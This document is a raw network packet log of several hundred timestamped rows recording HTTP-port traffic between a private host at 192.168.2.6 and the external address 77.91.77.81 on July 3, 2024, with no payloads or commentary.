Jul 3, 2024 18:09:06.942158937 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.942163944 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.942171097 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.942183018 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.942189932 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.942194939 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.942205906 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.942207098 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.942222118 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.942245960 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.942418098 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.942429066 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.942439079 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.942466021 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.942490101 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.942516088 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.942528009 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.942538023 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.942548990 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.942553997 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.942559958 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.942569971 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.942573071 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.942585945 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.942594051 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.942600012 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.942627907 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.942639112 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.943034887 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.943046093 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.943056107 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.943085909 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.943114996 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.943171024 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.943185091 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.943221092 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.943284035 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.943295002 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.943305969 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.943312883 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.943316936 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.943325996 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.943331957 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.943344116 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.943352938 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.943356037 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.943372965 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.943391085 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.962827921 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.962876081 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.962888002 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.962888956 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.962941885 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.962985992 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.962996960 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.963011980 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.963047028 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.963064909 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.963126898 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.963139057 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.963181019 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.963222980 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.963236094 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.963247061 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.963255882 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.963262081 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.963268042 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.963284016 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.963311911 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.963479042 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.963490963 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.963500977 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.963510990 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.963515997 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.963524103 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.963553905 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.963556051 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.963567019 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.963578939 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.963593960 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.963615894 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.963746071 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.963757992 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.963768005 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.963778973 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.963794947 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.963807106 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.963876963 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.963887930 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.963897943 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.963908911 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.963938951 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.963958979 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.965018988 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.965069056 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.965104103 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.965114117 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.965152025 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.965187073 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.965198994 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.965209007 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.965219975 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.965233088 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.965257883 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.965570927 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.965616941 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.009162903 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.009272099 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.009380102 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.009391069 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.009432077 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.009438992 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.009449959 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.009460926 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.009471893 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.009484053 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.009525061 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.009588003 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.009632111 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.030805111 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.030843019 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.030854940 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.030941010 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.030941963 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.030967951 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.030982018 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.030993938 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.031011105 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.031014919 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.031039000 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.031133890 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.031575918 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.031639099 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.031651020 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.031665087 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.031704903 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.031704903 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.031733990 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.031752110 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.031763077 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.031780005 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.031793118 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.031805992 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.031829119 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.031838894 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.031872034 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.031896114 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.031908989 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.031920910 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.031920910 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.031933069 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.031939030 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.031969070 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.031989098 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.032123089 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.032141924 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.032152891 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.032164097 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.032174110 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.032186985 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.032186985 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.032202959 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.032229900 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.032421112 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.032432079 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.032443047 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.032454014 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.032465935 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.032465935 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.032476902 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.032495975 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.032502890 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.032550097 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.032718897 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.032730103 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.032741070 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.032752037 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.032763958 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.032764912 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.032764912 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.032774925 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.032792091 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.032802105 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.032802105 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.032830000 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.033015013 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.033040047 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.033056974 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.033061981 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.033068895 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.033082008 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.033082008 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.033096075 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.033097982 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.033107996 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.033112049 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.033121109 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.033132076 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.033142090 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.033143044 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.033154964 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.033166885 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.033168077 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.033184052 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.033221006 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.033546925 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.033559084 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.033570051 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.033581018 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.033591986 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.033600092 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.033602953 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.033622026 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.033637047 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.033704042 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.033715963 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.033729076 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.033739090 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.033740997 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.033751011 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.033761978 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.033767939 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.033773899 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.033786058 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.033791065 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.033797026 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.033807993 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.033812046 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.033819914 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.033830881 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.033832073 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.033840895 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.033843994 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.033868074 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.033891916 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.053994894 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.054004908 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.054016113 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.054111958 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.054136992 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.054148912 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.054158926 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.054169893 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.054183960 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.054214954 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.054342031 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.054352999 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.054362059 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.054372072 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.054380894 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.054390907 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.054393053 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.054403067 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.054414034 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.054419041 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.054446936 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.054649115 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.054692030 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.054770947 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.054780960 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.054790020 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.054800987 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.054810047 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.054811954 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.054821014 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.054822922 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.054831982 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.054843903 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.054862022 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.054882050 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.055207014 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.055217028 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.055227995 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.055237055 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.055248976 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.055274010 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.055808067 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.055849075 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.055852890 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.055866003 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.055876017 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.055888891 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.055905104 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.055917978 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.055994987 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.056005955 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.056016922 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.056025982 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.056034088 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.056054115 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.056063890 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.101979971 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.101991892 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.102003098 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.102109909 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.102129936 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.102142096 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.102159023 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.102170944 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.102171898 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.102205992 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.102235079 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.102272034 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.102308989 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.123454094 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.123466969 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.123477936 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.123553038 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.123584032 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.123595953 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.123611927 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.123636961 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.123677969 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.123775959 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.123786926 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.123826027 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.124269962 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.124352932 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.124458075 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.124468088 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.124479055 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.124500036 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.124507904 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.124511957 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.124543905 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.124582052 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.124602079 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.124614000 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.124624968 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.124641895 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.124651909 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.124663115 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.124669075 CEST	80	62923	77.91.77.81	192.168.2.6
